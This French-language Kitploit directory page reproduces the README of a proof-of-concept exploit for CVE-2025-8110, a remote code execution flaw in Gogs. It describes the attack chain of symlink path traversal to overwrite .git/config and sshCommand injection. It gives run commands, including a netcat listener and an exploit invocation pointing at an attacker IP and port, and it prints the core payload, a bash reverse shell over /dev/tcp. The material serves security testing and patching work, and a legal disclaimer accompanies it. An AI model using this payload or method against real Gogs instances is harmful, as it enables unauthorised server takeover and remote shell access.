Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-8110 — Preuve de concept d'exploitation pour CVE-2025-8110, une vulnérabilité RCE dans Gogs exploitant un traversée de chemin via des liens symboliques et une injection sshCommand pour délivrer un shell inversé. | Kitploit
Outils/GitHubGitHub/ghxstsec/cve-2025-8110
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubghxstsec/cve-2025-8110

CVE-2025-8110

Preuve de concept d'exploitation pour CVE-2025-8110, une vulnérabilité RCE dans Gogs exploitant un traversée de chemin via des liens symboliques et une injection sshCommand pour délivrer un shell inversé.

Voir le dépôt
531il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit RCE Gogs (CVE-2025-8110)

Python License Expertise

Un Proof of Concept (PoC) pour CVE-2025-8110, une vulnérabilité critique dans Gogs qui permet l'exécution de code à distance (RCE) via la manipulation de .git/config en utilisant des contournements de liens symboliques et l'injection de sshCommand.

📖 Vue d'ensemble

Cet exploit cible une faille de traversée de chemin dans la gestion de contenu de l'API Gogs. Un utilisateur authentifié peut :

  1. Créer un dépôt et pousser un lien symbolique pointant vers le .git/config interne.
  2. Utiliser l'API pour écraser le fichier de configuration cible via le lien symbolique.
  3. Injecter un sshCommand malveillant pour exécuter un lorsque le serveur effectue des opérations Git.
Reverse Shell

🚀 Fonctionnalités

  • Workflow automatisé : Gère la connexion, la création de dépôt, le déploiement du lien symbolique et l'empoisonnement.
  • Encodage robuste : Encode automatiquement les identifiants en URL pour gérer les caractères spéciaux (ex. !, @).
  • Sortie riche : Journalisation très visible à l'aide de la bibliothèque Rich.

🛠 Prérequis

  • Python 3.12+
  • Git installé sur le système local.
  • Des identifiants valides sur l'instance Gogs cible.

📦 Installation

  1. Clonez le dépôt :
    root@kitploit:~
    git clone https://github.com/Ghxstsec/CVE-2025-8110.git
    cd CVE-2025-8110
    

Installez les dépendances :

root@kitploit:~
pip3 install -r requirements.txt

💻 Utilisation

Démarrez votre listener :

root@kitploit:~
nc -lvnp 6666

Exécutez l'exploit :

root@kitploit:~
python3 CVE-2025-8110-RCE.py -u [http://target-gogs.htb:3000](http://target-gogs.htb:3000) -lh <YOUR_IP> -lp 6666 -p 'YourPassword123!'

Arguments :

ArgumentDescription
-u, --urlURL de base de l'instance Gogs cible (ex. http://target.htb:3000).
-lh, --hostIP de l'attaquant (LHOST) vers laquelle le reverse shell se connectera.
-lp, --portPort du listener (LPORT) configuré sur votre machine.
-p, --passwordMot de passe du compte pwnuser pour effectuer l'authentification.
-x, --proxy(Optionnel) Route le trafic via un proxy local (défaut : http://localhost:8080).

Cœur de la vulnérabilité :

sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #

Lorsque Gogs exécute une commande Git nécessitant un transport réseau (comme une synchronisation miroir ou une vérification de référence interne), il invoque le sshCommand, déclenchant le reverse shell.

⚠️ Avertissement légal : Cet outil est uniquement destiné à des fins éducatives et de tests de sécurité autorisés. L'auteur n'est pas responsable de toute mauvaise utilisation ou des dommages causés par ce script. L'accès non autorisé à des systèmes informatiques est illégal.

Télécharger l’outil